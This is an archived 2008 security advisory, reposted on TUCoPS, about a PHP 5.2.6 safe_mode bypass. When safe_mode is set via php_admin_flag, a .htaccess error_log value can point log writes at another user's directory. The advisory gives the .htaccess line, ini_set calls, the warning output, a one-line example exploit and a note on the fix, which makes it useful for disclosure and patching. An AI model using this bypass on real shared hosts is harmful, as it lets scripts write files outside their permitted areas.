Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: va1876.htm

PHP 5.2.6 (error_log) safe_mode bypass



SecurityReason : PHP 5.2.6 (error_log) safe_mode bypass
SecurityReason : PHP 5.2.6 (error_log) safe_mode bypass



-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]=0D
=0D
Author: Maksymilian Arciemowicz (cXIb8O3)=0D
securityreason.com=0D
Date:=0D
- - Written: 10.11.2008=0D
- - Public: 20.11.2008=0D
=0D
SecurityReason Research=0D
SecurityAlert Id: 57=0D
=0D
CWE: CWE-264=0D
SecurityRisk: Medium=0D
=0D
Affected Software: PHP 5.2.6=0D
Advisory URL: http://securityreason.com/achievement_securityalert/57=0D 
Vendor: http://www.php.net=0D 
=0D
- --- 0.Description ---=0D
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.=0D
=0D
error_log=0D
=0D
They allow you to define your own error handling rules, as well as modify the way the errors can be logged. This allows you to change and enhance error reporting to suit your needs.=0D
=0D
- --- 0. error_log const. bypassed by php_admin_flag ---=0D
The main problem is between using safe_mode in global mode=0D
=0D
php.ini=AD:=0D
safe_mode = On=0D
=0D
and declaring via php_admin_flag=0D
=0D
=0D
...=0D
	php_admin_flag safe_mode On=0D
=0D
=0D
When we create some php script in /www/ and try call to:=0D
=0D
ini_set("error_log", "/hack/");=0D
=0D
or in /www/.htaccess=0D
=0D
php_value error_log "/hack/bleh.php"=0D
=0D
=0D
Result:=0D
=0D
Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0=0D
=0D
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4=0D
=0D
=0D
It was for safe_mode declared in php.ini. But if we use=0D
=0D
php_admin_flag safe_mode On =0D
=0D
in httpd.conf, we will get only=0D
=0D
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4=0D
=0D
syntax in .htaccess=0D
=0D
php_value error_log "/hack/blehx.php"=0D
=0D
is allowed and bypass safe_mode.=0D
=0D
example exploit:=0D
error_log("", 0);=0D
=0D
- --- 2. How to fix ---=0D
Fixed in CVS=0D
=0D
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup=0D 
=0D
Note:=0D
Do not use safe_mode as a main safety.=0D
=0D
 --- 3. Greets ---=0D
sp3x Infospec schain p_e_a pi3=0D
=0D
- --- 4. Contact ---=0D
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]=0D
Email: cxib [at] securityreason [dot] com=0D
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg=0D 
http://securityreason.com=0D 
http://securityreason.pl=0D 
-----BEGIN PGP SIGNATURE-----=0D
Version: GnuPG v2.0.9 (FreeBSD)=0D
=0D
iEYEARECAAYFAkklRdcACgkQpiCeOKaYa9bh0gCeN8rn2nWY0YUJ7QHmnxfD5TAe=0D
8hgAmwV0vc0Mk7rIUY5KJezctW589ydy=0D
=zM1X=0D
-----END PGP SIGNATURE-----=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH